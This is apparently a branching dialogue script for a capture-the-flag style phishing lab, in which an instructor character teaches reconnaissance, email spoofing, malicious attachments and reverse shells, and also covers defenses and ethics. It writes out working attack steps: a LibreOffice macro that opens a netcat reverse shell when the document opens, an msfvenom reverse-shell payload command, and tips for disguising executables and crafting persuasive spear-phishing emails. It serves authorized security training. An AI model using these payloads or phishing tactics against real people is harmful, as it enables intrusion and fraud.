Good. Remember that throughout. + -> social_engineering_hub + +// =========================================== +// MAIN TRAINING HUB +// =========================================== + +=== social_engineering_hub === + +Social Engineering Specialist: What aspect of social engineering and phishing would you like to cover? + ++ {not intro_human_factors_discussed} [Human factors in cybersecurity] + -> human_factors_intro ++ {not phishing_basics_discussed} [Phishing attack fundamentals] + -> phishing_basics ++ {not reconnaissance_discussed} [Reconnaissance and information gathering] + -> reconnaissance_intro ++ {not email_spoofing_discussed} [Email spoofing techniques] + -> email_spoofing_intro ++ {not malicious_attachments_discussed} [Creating malicious attachments] + -> malicious_attachments_intro ++ {not reverse_shells_discussed} [Reverse shells and remote access] + -> reverse_shells_intro ++ {phishing_basics_discussed and malicious_attachments_discussed} [Show me the attack workflow] + -> attack_workflow ++ {ethics_discussed or ethical_awareness_shown} [Practical challenge tips] + -> challenge_tips ++ {not ethics_discussed} [Ethical considerations and defensive applications] + -> ethics_discussion ++ [I'm ready to start the simulation] + -> ready_for_simulation ++ [That's all for now] + -> end_session + +// =========================================== +// HUMAN FACTORS IN CYBERSECURITY +// =========================================== + +=== human_factors_intro === +~ intro_human_factors_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Human factors. The foundation of social engineering attacks. + +Social Engineering Specialist: Technical security can be excellent—strong encryption, patched systems, robust firewalls. But all of that can be bypassed if you can convince a human to let you in. + +Social Engineering Specialist: Users have mental models of security and risk. Attackers exploit gaps between those models and reality. If a user doesn't perceive danger, they won't apply security measures. + +Social Engineering Specialist: The classic saying: "The user is the weakest link." It's true, but also incomplete. Users aren't inherently weak—they're often inadequately trained, using poorly designed security systems, under time pressure, making snap decisions. + +* [Why do humans fall for these attacks?] + ~ weakest_link_discussed = true + You: What makes humans so vulnerable to social engineering? + -> human_vulnerabilities +* [How do we defend against this?] + You: If humans are vulnerable, how do we protect systems? + -> human_factors_defense +* [I see—target the human, not the system] + -> social_engineering_hub + +=== human_vulnerabilities === +~ instructor_rapport += 10 + +Social Engineering Specialist: Excellent question. Multiple factors make humans vulnerable: + +Social Engineering Specialist: **Psychology**: Humans are wired for trust and helpfulness. We want to assist others. Attackers exploit that. + +Social Engineering Specialist: **Cognitive biases**: Authority bias makes us trust official-looking messages. Urgency causes us to skip security checks. Curiosity makes us click suspicious links. + +Social Engineering Specialist: **Complexity**: Security systems are often complicated and user-hostile. When security gets in the way of work, users find workarounds. + +Social Engineering Specialist: **Information asymmetry**: Attackers know tricks users don't. A well-crafted phishing email can be nearly indistinguishable from legitimate correspondence. + +Social Engineering Specialist: **Scale**: Attackers can send thousands of phishing emails. They only need one person to click. The defender has to get it right every time. + +~ instructor_rapport += 5 +-> social_engineering_hub + +=== human_factors_defense === +~ instructor_rapport += 10 + +Social Engineering Specialist: Good instinct. Defense requires layered approaches: + +Social Engineering Specialist: **Security awareness training**: Educate users about phishing indicators, social engineering tactics, and safe behaviors. Make them part of the defense. + +Social Engineering Specialist: **Usable security**: Design security systems that are intuitive and don't obstruct legitimate work. Security that's too burdensome will be circumvented. + +Social Engineering Specialist: **Technical controls**: Email filtering, attachment sandboxing, multi-factor authentication. Don't rely solely on human vigilance. + +Social Engineering Specialist: **Culture**: Create organizational culture where questioning suspicious requests is encouraged, not punished. Users should feel safe reporting potential phishing. + +Social Engineering Specialist: **Regular testing**: Conduct simulated phishing campaigns to identify vulnerable users and improve training. What we're doing here—authorized, controlled testing. + +~ instructor_rapport += 10 +-> social_engineering_hub + +// =========================================== +// PHISHING BASICS +// =========================================== + +=== phishing_basics === +~ phishing_basics_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Phishing. One of the most effective attack vectors in cybersecurity. + +Social Engineering Specialist: Phishing is social engineering via electronic communication—typically email. The attacker crafts a message designed to trick the recipient into: +- Revealing sensitive information (credentials, financial data) +- Clicking malicious links (web attacks, credential harvesting) +- Opening malicious attachments (malware installation) + +Social Engineering Specialist: This lab focuses on the attachment vector. Getting a victim to execute malicious code by opening a document or program. + +Social Engineering Specialist: Once they open that attachment, the attacker gains access to their system. From there: data theft, lateral movement, persistent access. + +* [Tell me about spear phishing] + ~ spear_phishing_discussed = true + You: What's the difference between phishing and spear phishing? + -> spear_phishing_explanation +* [How successful are phishing attacks?] + You: Do these attacks actually work in practice? + -> phishing_success_rates +* [What makes a phishing email convincing?] + You: How do attackers make emails look legitimate? + -> convincing_phishing +* [Understood] + -> social_engineering_hub + +=== spear_phishing_explanation === +~ instructor_rapport += 10 + +Social Engineering Specialist: Important distinction. + +Social Engineering Specialist: **Phishing**: Broad, untargeted attacks. Send millions of generic emails, hope a small percentage responds. Spray and pray approach. + +Social Engineering Specialist: **Spear phishing**: Targeted attacks against specific individuals or organizations. Attacker researches the target, customizes the message, references real information. + +Social Engineering Specialist: Spear phishing is dramatically more effective. When an email mentions your colleague by name, references a real project, comes from what appears to be a trusted source—much harder to detect. + +Social Engineering Specialist: This lab simulates spear phishing. You'll research targets, craft personalized messages, exploit relationships and trust. + +Social Engineering Specialist: In real-world APT (Advanced Persistent Threat) attacks, spear phishing is often the initial compromise. High-value targets get carefully researched, precisely targeted emails. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== phishing_success_rates === +~ instructor_rapport += 8 + +Social Engineering Specialist: Disturbingly successful. + +Social Engineering Specialist: Industry studies show phishing success rates vary widely, but typical ranges: +- 10-30% of recipients open phishing emails +- 5-15% click malicious links or open attachments +- Even with training, 2-5% still fall for sophisticated phishing + +Social Engineering Specialist: That might sound low, but in an organization with 1000 employees, that's 20-50 successful compromises from a single campaign. + +Social Engineering Specialist: Spear phishing success rates are much higher—30-45% click rates are common. Highly personalized attacks can achieve 60%+ success. + +Social Engineering Specialist: The economics favor attackers: sending 10,000 phishing emails costs nearly nothing. Even 1% success is profitable. + +Social Engineering Specialist: And one successful compromise can be enough. One executive's email account, one developer's credentials, one system admin's access—that's your foothold. + +~ instructor_rapport += 8 +-> social_engineering_hub + +=== convincing_phishing === +~ instructor_rapport += 10 + +Social Engineering Specialist: The art of the convincing phish. Several key elements: + +Social Engineering Specialist: **Legitimate-looking sender**: Spoofed email addresses from trusted domains. We'll cover technical spoofing shortly. + +Social Engineering Specialist: **Personalization**: Use target's name, reference their role, mention real colleagues or projects. + +Social Engineering Specialist: **Context and pretext**: Create plausible reason for contact. "Financial report for review," "urgent HR policy update," "document you requested." + +Social Engineering Specialist: **Professional presentation**: Proper grammar, corporate branding, official-looking signatures. Amateur phishing is easy to spot—professional phishing is not. + +Social Engineering Specialist: **Appropriate attachments**: Send document types the target would expect to receive. Accountants get spreadsheets, lawyers get legal documents, designers get graphics. + +Social Engineering Specialist: **Psychological triggers**: Authority (from executive), urgency (immediate action needed), fear (account suspended), curiosity (confidential information). + +Social Engineering Specialist: Combine these elements, and you create emails that even security-aware users might trust. + +~ instructor_rapport += 10 +-> social_engineering_hub + +// =========================================== +// RECONNAISSANCE +// =========================================== + +=== reconnaissance_intro === +~ reconnaissance_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Reconnaissance. The foundation of targeted attacks. + +Social Engineering Specialist: Before crafting phishing emails, you need intelligence: employee names, email addresses, roles, relationships, interests. + +Social Engineering Specialist: In this simulation, you'll browse a target organization's website. In real operations, reconnaissance is much broader: + +Social Engineering Specialist: **OSINT (Open Source Intelligence)**: LinkedIn profiles, company websites, social media, press releases, job postings, conference presentations. + +Social Engineering Specialist: **Email pattern analysis**: Most organizations follow predictable patterns. firstname.lastname@company.com, flastname@company.com, etc. + +Social Engineering Specialist: **Relationship mapping**: Who works with whom? Who reports to whom? Who's friends outside work? + +Social Engineering Specialist: **Interest identification**: What are targets passionate about? Sports teams, hobbies, causes? These can be social engineering hooks. + +* [How much reconnaissance is typical?] + You: How long do attackers spend on reconnaissance? + -> recon_timeframes +* [What tools help with OSINT?] + You: Are there tools that automate information gathering? + -> osint_tools +* [Got it—gather intelligence first] + ~ completed_reconnaissance = true + -> social_engineering_hub + +=== recon_timeframes === +~ instructor_rapport += 8 + +Social Engineering Specialist: Depends on the operation and target value. + +Social Engineering Specialist: **Opportunistic attacks**: Minimal reconnaissance. Attacker identifies employee email addresses and sends generic phishing. Hours or less. + +Social Engineering Specialist: **Targeted campaigns**: Days to weeks. Research key employees, understand organizational structure, identify high-value targets. + +Social Engineering Specialist: **APT operations**: Months. Nation-state actors conducting espionage might spend extensive time profiling targets, mapping networks, planning multi-stage operations. + +Social Engineering Specialist: The more valuable the target, the more reconnaissance is justified. Compromising a Fortune 500 CEO's email? Weeks of careful research is worthwhile. + +Social Engineering Specialist: For this lab, you'll spend 15-30 minutes on reconnaissance. Enough to understand the organization and personalize attacks, but compressed for training purposes. + +~ instructor_rapport += 5 +~ completed_reconnaissance = true +-> social_engineering_hub + +=== osint_tools === +~ instructor_rapport += 10 + +Social Engineering Specialist: Many tools assist OSINT: + +Social Engineering Specialist: **theHarvester**: Scrapes search engines, social media for email addresses and names associated with a domain. + +Social Engineering Specialist: **Maltego**: Visual link analysis. Maps relationships between people, companies, domains, infrastructure. + +Social Engineering Specialist: **recon-ng**: Framework for web reconnaissance. Modules for gathering information from various sources. + +Social Engineering Specialist: **SpiderFoot**: Automated OSINT gathering from 100+ sources. + +Social Engineering Specialist: **LinkedIn, Facebook, Twitter**: Directly browsing social media often reveals extensive information. People share surprising amounts publicly. + +Social Engineering Specialist: **Google dorking**: Advanced search operators to find exposed information. site:target.com filetype:pdf reveals documents, for example. + +Social Engineering Specialist: **Shodan**: Search engine for internet-connected devices. Find exposed services and infrastructure. + +Social Engineering Specialist: For this exercise, you'll manually browse the target website. Simple, but effective for understanding the process. + +~ instructor_rapport += 10 +~ completed_reconnaissance = true +-> social_engineering_hub + +// =========================================== +// EMAIL SPOOFING +// =========================================== + +=== email_spoofing_intro === +~ email_spoofing_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Email spoofing. Fundamental to convincing phishing. + +Social Engineering Specialist: Email protocols (SMTP) have a critical flaw: the "From" address is not authenticated. You can claim to be anyone. + +Social Engineering Specialist: When you send an email, you specify the sender address. Nothing inherently prevents you from specifying someone else's address. + +Social Engineering Specialist: This is why phishing can appear to come from trusted sources—colleagues, executives, IT departments, banks. + +Social Engineering Specialist: Modern defenses exist: SPF, DKIM, DMARC—technologies that authenticate sender domains. But implementation is inconsistent, and many organizations haven't deployed them properly. + +* [Tell me about SPF/DKIM/DMARC] + You: How do those authentication technologies work? + -> email_authentication +* [How do I spoof emails in this lab?] + You: What's the technique for spoofing sender addresses? + -> spoofing_technique +* [Why hasn't this been fixed?] + You: If this is a known problem, why hasn't email been redesigned? + -> email_design_problems +* [Understood—email spoofing is possible] + ~ completed_spoofing = true + -> social_engineering_hub + +=== email_authentication === +~ instructor_rapport += 10 + +Social Engineering Specialist: Good question. Email authentication mechanisms: + +Social Engineering Specialist: **SPF (Sender Policy Framework)**: DNS record specifying which mail servers are authorized to send email for a domain. Receiving servers check if email came from authorized server. + +Social Engineering Specialist: **DKIM (DomainKeys Identified Mail)**: Cryptographic signature attached to emails. Proves email wasn't modified in transit and came from declared domain. + +Social Engineering Specialist: **DMARC (Domain-based Message Authentication, Reporting, Conformance)**: Policy framework built on SPF and DKIM. Tells receiving servers what to do with emails that fail authentication—reject, quarantine, or accept with warning. + +Social Engineering Specialist: When properly implemented, these make spoofing much harder. But "properly implemented" is key. + +Social Engineering Specialist: Many organizations haven't configured DMARC. Many email servers don't strictly enforce these policies. Spoofing remains viable in many scenarios. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== spoofing_technique === +~ instructor_rapport += 8 + +Social Engineering Specialist: In this lab, spoofing is straightforward. + +Social Engineering Specialist: In Thunderbird email client, you can customize the "From" address. Click the dropdown next to your address, select "Customize From Address," and enter whatever you want. + +Social Engineering Specialist: In the simulation, this works seamlessly—no authentication checks. In real environments, spoofing might be blocked by email server policies or recipient filtering. + +Social Engineering Specialist: Other spoofing approaches: +- Using SMTP directly with telnet or specialized tools +- Configuring mail servers with fake sender information +- Exploiting misconfigured email servers that don't require authentication + +Social Engineering Specialist: The simulation simplifies this to focus on social engineering tactics rather than technical bypasses. + +~ completed_spoofing = true +~ instructor_rapport += 5 +-> social_engineering_hub + +=== email_design_problems === +~ instructor_rapport += 10 + +Social Engineering Specialist: Excellent critical thinking. + +Social Engineering Specialist: Email protocols date to early internet days—1980s SMTP. Security wasn't a primary concern. Ease of use and interoperability were priorities. + +Social Engineering Specialist: Redesigning email faces massive challenges: +- **Legacy compatibility**: Billions of systems rely on existing protocols +- **Decentralization**: Email has no central authority to enforce changes +- **Deployment inertia**: Organizations resist upgrading working systems +- **Complexity**: Cryptographic authentication adds complexity users might not understand + +Social Engineering Specialist: SPF/DKIM/DMARC are retrofit solutions—adding authentication to existing protocols. They work, but require universal adoption to be fully effective. + +Social Engineering Specialist: Classic security challenge: replacing widely-deployed insecure systems is incredibly difficult, even when better alternatives exist. + +Social Engineering Specialist: Lesson: technical debt and legacy systems create enduring vulnerabilities. Design security in from the start, because retrofitting is painful. + +~ instructor_rapport += 15 +-> social_engineering_hub + +// =========================================== +// MALICIOUS ATTACHMENTS +// =========================================== + +=== malicious_attachments_intro === +~ malicious_attachments_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Malicious attachments. The payload delivery mechanism. + +Social Engineering Specialist: Once you've crafted a convincing phishing email, you need a malicious attachment that compromises the target's system when opened. + +Social Engineering Specialist: Three main types we'll cover: +1. **Executable programs**: Compiled malware that runs directly +2. **Office documents with macros**: Word/Excel/LibreOffice files containing malicious scripts +3. **Exploit documents**: Files that exploit vulnerabilities in document readers + +Social Engineering Specialist: The choice depends on your target. Different roles expect different file types. + +* [Tell me about choosing appropriate attachment types] + ~ attachment_types_discussed = true + You: How do I match attachments to targets? + -> attachment_targeting +* [Explain macros in documents] + You: How do office macros work as attack vectors? + -> macro_explanation +* [Show me executable payloads] + You: What about standalone malware programs? + -> executable_payloads +* [I understand the options] + -> social_engineering_hub + +=== attachment_targeting === +~ instructor_rapport += 10 + +Social Engineering Specialist: Matching attachments to targets—critical for success. + +Social Engineering Specialist: **Accountants and finance**: Expect spreadsheets. LibreOffice Calc (.ods) or Excel (.xlsx) with macros. "Quarterly report," "budget analysis," "expense tracking." + +Social Engineering Specialist: **Executives and managers**: Might receive various documents. Word documents (.docx, .odt) with "strategic plan," "board presentation," "confidential memo." + +Social Engineering Specialist: **IT and technical staff**: Might be suspicious of documents, but could receive scripts, logs, or technical reports. Executable tools less suspicious to technical users. + +Social Engineering Specialist: **HR departments**: Resumes, applications, employee documents. Word documents or PDFs. + +Social Engineering Specialist: **General principle**: Send what the target expects to receive in their role. Accountants opening unexpected executables? Suspicious. Accountants opening financial spreadsheets? Routine. + +Social Engineering Specialist: In this simulation, targets have preferences. Some will only open specific file types. Pay attention to their roles and feedback. + +~ instructor_rapport += 10 +~ completed_attachment = true +-> social_engineering_hub + +=== macro_explanation === +~ macros_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Office macros. Powerful and frequently exploited. + +Social Engineering Specialist: Macros are scripts embedded in office documents—Microsoft Office or LibreOffice. Originally designed for automating document tasks: calculations, formatting, data processing. + +Social Engineering Specialist: Macro languages (Visual Basic for Applications in MS Office, LibreOffice Basic) are full programming languages. They can: +- Execute system commands +- Access files and network resources +- Download and run additional malware +- Steal data + +Social Engineering Specialist: Modern office software warns users about macros. But many users click "Enable Macros" without understanding the risk—especially if the document looks legitimate and they expect to receive it. + +Social Engineering Specialist: Social engineering comes into play: "This document contains macros required to view the content. Please enable macros to continue." + +* [How do I create a malicious macro?] + ~ macro_creation_discussed = true + You: Walk me through creating a macro payload. + -> macro_creation +* [What defenses exist against macro malware?] + You: How do organizations protect against malicious macros? + -> macro_defenses +* [Got the concept] + -> social_engineering_hub + +=== macro_creation === +~ instructor_rapport += 10 + +Social Engineering Specialist: Creating a malicious macro—walkthrough: + +Social Engineering Specialist: **Step 1**: Open LibreOffice Writer or Calc. Tools → Macros → Organize Macros → Basic. + +Social Engineering Specialist: **Step 2**: Create new macro in your document. Click document name, click "New." + +Social Engineering Specialist: **Step 3**: Write the macro code. Example using Shell command to execute system commands: + +Social Engineering Specialist: `Sub Main + Shell("/bin/nc", vbNormalFocus, "-e /bin/sh YOUR_IP 8080") +End Sub` + +Social Engineering Specialist: This creates a reverse shell—connects back to your system with command line access. + +Social Engineering Specialist: **Step 4**: Configure macro to run on document open. Tools → Customize → Events → Open Document → Macro → select your macro. + +Social Engineering Specialist: **Step 5**: Add convincing content to document. Financial data, corporate memo, whatever fits your pretext. + +Social Engineering Specialist: **Step 6**: Save as .odt or .ods. Attach to phishing email. + +Social Engineering Specialist: When victim opens document and enables macros (or if their security is set to low), your payload executes. + +~ instructor_rapport += 10 +~ completed_attachment = true +-> social_engineering_hub + +=== macro_defenses === +~ instructor_rapport += 10 + +Social Engineering Specialist: Macro defenses—layered approach: + +Social Engineering Specialist: **Technical controls:** +- Disable macros by default (most modern office software does this) +- Block macros from internet-sourced documents +- Application whitelisting—only approved programs can execute +- Email gateway scanning for malicious macros + +Social Engineering Specialist: **User training:** +- Educate users never to enable macros in unexpected documents +- Teach users to verify sender through out-of-band communication +- Create culture where users question suspicious documents + +Social Engineering Specialist: **Policy enforcement:** +- Organizational policies prohibiting macro usage except for approved documents +- Removal of macro execution capabilities from standard user systems +- Require code signing for legitimate macros + +Social Engineering Specialist: The challenge: many organizations legitimately use macros for business processes. Completely blocking them disrupts workflow. Balance between usability and security. + +Social Engineering Specialist: Defense-in-depth: combine technical controls, user awareness, and policy. No single measure is perfect. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== executable_payloads === +~ instructor_rapport += 5 + +Social Engineering Specialist: Executable malware payloads. More direct than macros. + +Social Engineering Specialist: Standalone programs that run malicious code when executed. Typically ELF binaries on Linux, EXE on Windows. + +Social Engineering Specialist: Advantage: No need for user to enable macros. If they run the file, it executes. + +Social Engineering Specialist: Disadvantage: More obviously suspicious. Users might question why they're being sent a program rather than a document. + +Social Engineering Specialist: Works better with technical targets who might expect to receive tools, scripts, or utilities. + +* [How do I create an executable payload?] + ~ msfvenom_discussed = true + You: What tools create malicious executables? + -> msfvenom_payloads +* [How do attackers disguise executables?] + You: How do you make executables look legitimate? + -> executable_disguises +* [Understood] + -> social_engineering_hub + +=== msfvenom_payloads === +~ instructor_rapport += 10 + +Social Engineering Specialist: msfvenom. Metasploit Framework's payload generator. + +Social Engineering Specialist: Creates standalone payloads for various platforms. For Linux targets: + +Social Engineering Specialist: `msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f elf -o malware` + +Social Engineering Specialist: Breaking this down: +- `-a x64` — architecture (64-bit) +- `--platform linux` — target OS +- `-p linux/x64/shell_reverse_tcp` — payload type (reverse shell) +- `LHOST=YOUR_IP` — your IP for callback +- `LPORT=4444` — your listening port +- `-f elf` — output format (Linux executable) +- `-o malware` — output filename + +Social Engineering Specialist: Before sending, set up listener to receive connection: +`nc -lvvp 4444` + +Social Engineering Specialist: When victim runs the malware, it connects back to you. You get command line access to their system. + +Social Engineering Specialist: msfvenom can generate payloads for any platform, architecture, and access method. Incredibly versatile tool. + +~ instructor_rapport += 10 +~ completed_attachment = true +-> social_engineering_hub + +=== executable_disguises === +~ instructor_rapport += 8 + +Social Engineering Specialist: Disguising executables—social engineering and technical tricks: + +Social Engineering Specialist: **Naming**: Use document-like names. "Financial_Report.pdf.exe" (exploiting hidden file extensions on Windows). On Linux: "report.sh" looks like a script, more plausible than random binary. + +Social Engineering Specialist: **Icons**: Change executable icon to document icon. Makes files appear to be documents visually. + +Social Engineering Specialist: **Packers and crypters**: Obfuscate executable code to avoid antivirus detection. Tools like UPX, custom packers. + +Social Engineering Specialist: **Legitimate tool abuse**: Package malicious code with legitimate software. "Install this tool to view the document." + +Social Engineering Specialist: **Pretext engineering**: Convince target they need to run the program. "Security update," "codec required," "validation tool." + +Social Engineering Specialist: In practice, getting users to run raw executables is harder than macro documents. But with right pretext and target, it works. + +~ instructor_rapport += 8 +-> social_engineering_hub + +// =========================================== +// REVERSE SHELLS +// =========================================== + +=== reverse_shells_intro === +~ reverse_shells_discussed = true +~ instructor_rapport += 5 + +Social Engineering Specialist: Reverse shells. The goal of attachment-based phishing. + +Social Engineering Specialist: **Normal shell**: You connect TO a remote system. You initiate the connection. + +Social Engineering Specialist: **Reverse shell**: Remote system connects TO you. Victim's machine initiates the connection. + +Social Engineering Specialist: Why reverse? Several advantages: +- Bypasses firewalls (outbound connections usually allowed, inbound blocked) +- No need for victim to have open ports +- Works from behind NAT +- Victim's actions trigger connection + +* [How do reverse shells work technically?] + ~ netcat_listener_discussed = true + You: Explain the technical mechanism. + -> reverse_shell_mechanics +* [What can I do with remote shell access?] + You: Once I have a shell, what's next? + -> post_exploitation_basics +* [Understood the concept] + -> social_engineering_hub + +=== reverse_shell_mechanics === +~ instructor_rapport += 10 + +Social Engineering Specialist: Reverse shell mechanics—simple but elegant: + +Social Engineering Specialist: **Your system (attacker)**: +Set up listener waiting for connections: +`nc -lvvp 4444` + +This listens on port 4444. When victim connects, you get their command line. + +Social Engineering Specialist: **Victim's system**: +Malicious payload runs, connecting back to you: +`nc -e /bin/sh YOUR_IP 4444` + +Or embedded in macro, executable, whatever payload you delivered. + +Social Engineering Specialist: **Result**: +Victim's machine makes outbound connection to your IP:4444. Your listener accepts connection. You now type commands that execute on victim's system. + +Social Engineering Specialist: **Network perspective**: +From network monitoring, looks like victim initiated connection to external IP. Harder to distinguish from legitimate traffic than inbound connection to victim. + +Social Engineering Specialist: Tools like netcat, msfvenom payloads, custom scripts—all create reverse shell connections. + +~ instructor_rapport += 10 +-> social_engineering_hub + +=== post_exploitation_basics === +~ instructor_rapport += 10 + +Social Engineering Specialist: Post-exploitation. What you do after gaining access. + +Social Engineering Specialist: **Initial assessment**: +- `whoami` — what user are you? +- `pwd` — where are you in filesystem? +- `ls -la` — what's in current directory? +- `uname -a` — system information + +Social Engineering Specialist: **Objective completion**: +For this lab: read flag files in home directories. In real operations: depends on goals. + +Social Engineering Specialist: **Common post-exploitation actions**: +- Privilege escalation (gain root/admin access) +- Lateral movement (compromise additional systems) +- Data exfiltration (steal information) +- Persistence (maintain access for future use) +- Covering tracks (delete logs, hide presence) + +Social Engineering Specialist: **Limitations of simple shells**: +Basic netcat shells are fragile—no TTY, limited interaction, easily disconnected. Advanced: upgrade to Meterpreter, SSH tunnel, or other robust access methods. + +Social Engineering Specialist: For this lab, simple shell is sufficient to read flags and demonstrate access. + +~ instructor_rapport += 10 +-> social_engineering_hub + +// =========================================== +// ATTACK WORKFLOW +// =========================================== + +=== attack_workflow === +~ instructor_rapport += 5 + +Social Engineering Specialist: Complete attack workflow for this lab: + +Social Engineering Specialist: **Phase 1 - Reconnaissance**: +- Browse target organization website (accountingnow.com) +- Document employee names, email addresses, roles +- Note potential interests, relationships + +Social Engineering Specialist: **Phase 2 - Payload Preparation**: +- Set up netcat listener: `nc -lvvp 4444` or `nc -lvvp 8080` +- Create malicious attachment: + * Macro document (LibreOffice with Shell command) + * Executable payload (msfvenom) +- Match payload type to target role + +Social Engineering Specialist: **Phase 3 - Email Crafting**: +- Compose phishing email in Thunderbird +- Spoof sender to trusted source (colleague, manager) +- Personalize content (use target's name, reference their role) +- Create plausible pretext for attachment +- Attach malicious file + +Social Engineering Specialist: **Phase 4 - Engagement**: +- Send email +- Monitor for replies (simulation provides feedback) +- Refine approach based on victim responses +- Iterate until victim opens attachment + +Social Engineering Specialist: **Phase 5 - Exploitation**: +- Victim opens attachment, payload executes +- Reverse shell connects to your listener +- You gain remote access + +Social Engineering Specialist: **Phase 6 - Objective**: +- Navigate filesystem: `ls -la`, `cd /home/victim` +- Read flag files: `cat flag` +- Submit flags to prove success + ++ [Back to main menu] + -> social_engineering_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +~ instructor_rapport += 5 + +Social Engineering Specialist: Practical tips for the simulation: + +Social Engineering Specialist: **Reconnaissance tips**: +- Explore every page on accountingnow.com +- Note employee roles—finance, management, IT, etc. +- Look for names mentioned in multiple places (relationships) + +Social Engineering Specialist: **Email crafting tips**: +- Pay attention to victim feedback—they tell you what's wrong +- Use names (theirs and colleagues') in messages +- Spoof sender to someone they'd trust +- Create urgency or authority without being obvious + +Social Engineering Specialist: **Technical tips**: +- Start netcat listener BEFORE sending email +- For macros: ensure victim's security is set to allow execution +- Be patient—LibreOffice can take 1-2 minutes to launch +- If connection fails, check IP addresses and ports + +Social Engineering Specialist: **Payload selection**: +- Finance/accounting: spreadsheets (.ods with macros) +- Management: documents (.odt with macros) +- Technical roles: might accept executables +- Experiment if initial attachment type fails + +Social Engineering Specialist: **Shell usage**: +- Simple commands only in basic reverse shells +- `ls -la` to list files +- `cat filename` to read files +- `pwd` to check location +- Flags are in victim home directories + +Social Engineering Specialist: **Troubleshooting**: +- No connection? Verify listener running and victim opened file +- No victim response? Check email content against feedback +- Permission denied? You're limited to victim's user permissions + ++ [Back to main menu] + -> social_engineering_hub + +// =========================================== +// ETHICS DISCUSSION +// =========================================== + +=== ethics_discussion === +~ ethics_discussed = true +~ instructor_rapport += 10 + +Social Engineering Specialist: Critical topic. Ethical considerations. + +Social Engineering Specialist: The techniques you're learning are powerful and potentially harmful. Let's be absolutely clear about ethical boundaries: + +Social Engineering Specialist: **Authorized testing only**: Everything we've covered is for authorized penetration testing within controlled environments. Using these techniques against systems you don't have explicit written permission to test is illegal—computer fraud, unauthorized access, potential felony charges. + +Social Engineering Specialist: **Simulation vs reality**: This lab is a controlled simulation. Victims are non-existent. In real penetration tests, you're testing real employees with real systems, under contract, with defined scope. + +Social Engineering Specialist: **Defensive purpose**: You're learning these techniques to: +- Conduct authorized security assessments +- Understand attacker methods to build defenses +- Train others in recognizing social engineering +- Improve organizational security posture + +Social Engineering Specialist: **Professional responsibility**: Security professionals must operate ethically. Our field requires trust. Abuse these skills and you damage the entire profession. + +* [What about "ethical hacking" justifications?] + ~ ethical_awareness_shown = true + You: I've heard people justify unauthorized testing as "ethical hacking" to help organizations. + -> ethical_hacking_discussion +* [How do legitimate penetration tests work?] + You: How does authorized testing differ from what we're practicing? + -> pentest_process +* [I understand the ethical boundaries] + ~ ethical_awareness_shown = true + You: Clear on the ethics. Authorized testing, defensive purpose, professional responsibility. + Social Engineering Specialist: Excellent. Remember that throughout your career. + ~ instructor_rapport += 15 + -> social_engineering_hub + +=== ethical_hacking_discussion === +~ instructor_rapport += 15 + +Social Engineering Specialist: "Ethical hacking" without authorization is a contradiction. + +Social Engineering Specialist: Some people justify unauthorized penetration testing as "helping" organizations by exposing vulnerabilities. This is wrong on multiple levels: + +Social Engineering Specialist: **Legally**: Unauthorized access is illegal, regardless of intent. "I was trying to help" is not a legal defense. You can be prosecuted. + +Social Engineering Specialist: **Ethically**: You're making decisions about acceptable risk for someone else's systems without their consent. Not your choice to make. + +Social Engineering Specialist: **Practically**: Penetration testing can cause disruptions, trigger incident responses, waste security team resources. Unauthorized testing creates real costs. + +Social Engineering Specialist: **Professionally**: It demonstrates poor judgment and lack of integrity. Organizations won't hire security professionals who've demonstrated willingness to break rules. + +Social Engineering Specialist: **Proper approach**: If you identify a vulnerability, responsible disclosure. Report it to the organization through appropriate channels (security contact, bug bounty program). Let them decide how to handle it. + +Social Engineering Specialist: The distinction is consent. Authorized testing with consent is ethical. Unauthorized testing without consent is not—even with "good intentions." + +~ instructor_rapport += 20 +-> social_engineering_hub + +=== pentest_process === +~ instructor_rapport += 15 + +Social Engineering Specialist: Legitimate penetration testing process: + +Social Engineering Specialist: **Engagement and contracting**: +- Client requests penetration test +- Scope is defined: which systems, which methods, what's off-limits +- Contract specifies deliverables, timeline, liability +- Written authorization provided +- Emergency contacts established + +Social Engineering Specialist: **Rules of engagement**: +- Testing windows (when testing is permitted) +- Prohibited actions (don't DOS production systems, don't access sensitive data types) +- Notification procedures (how to report critical findings immediately) +- Legal protections and authorizations + +Social Engineering Specialist: **Execution**: +- Testing conducted within agreed scope +- Documentation of all actions +- Communication with client contact +- Immediate reporting of critical vulnerabilities + +Social Engineering Specialist: **Reporting**: +- Comprehensive report of findings +- Risk ratings and remediation recommendations +- Executive summary for leadership +- Technical details for security teams +- Retest to verify fixes + +Social Engineering Specialist: This structured, authorized, documented process is what makes penetration testing ethical and legal. Everything else is unauthorized hacking. + +~ instructor_rapport += 15 +-> social_engineering_hub + +// =========================================== +// READY FOR SIMULATION +// =========================================== + +=== ready_for_simulation === + +Social Engineering Specialist: Good. Let's review readiness: + +{reconnaissance_discussed and phishing_basics_discussed and malicious_attachments_discussed: + Social Engineering Specialist: You've covered the core material. You understand reconnaissance, phishing tactics, and payload creation. +- else: + Social Engineering Specialist: You might want to review topics you haven't covered. But you've got enough to attempt the simulation. +} + +{ethics_discussed or ethical_awareness_shown: + Social Engineering Specialist: And you're clear on ethical boundaries. That's critical. +- else: + Social Engineering Specialist: Before you start—review the ethics discussion. Understanding legal and ethical constraints is non-negotiable. +} + +Social Engineering Specialist: Simulation objectives: +1. Reconnaissance on accountingnow.com—identify targets +2. Set up netcat listener for reverse shells +3. Create malicious attachments (macros or executables) +4. Craft convincing phishing emails +5. Spoof sender addresses for credibility +6. Send targeted emails to employees +7. Gain remote access when victims open attachments +8. Read flag files from victim home directories + +Social Engineering Specialist: Remember: in the simulation, victims provide feedback. They'll tell you why they don't trust your emails. Use that intelligence to refine your approach. + +Social Engineering Specialist: This is iterative social engineering. First attempt might fail. Adjust and try again. That's realistic—real attackers iterate too. + +{instructor_rapport >= 60: + Social Engineering Specialist: You've demonstrated strong understanding and good ethical awareness. You're well-prepared for this exercise. +} + +Social Engineering Specialist: Final reminder: these are authorized 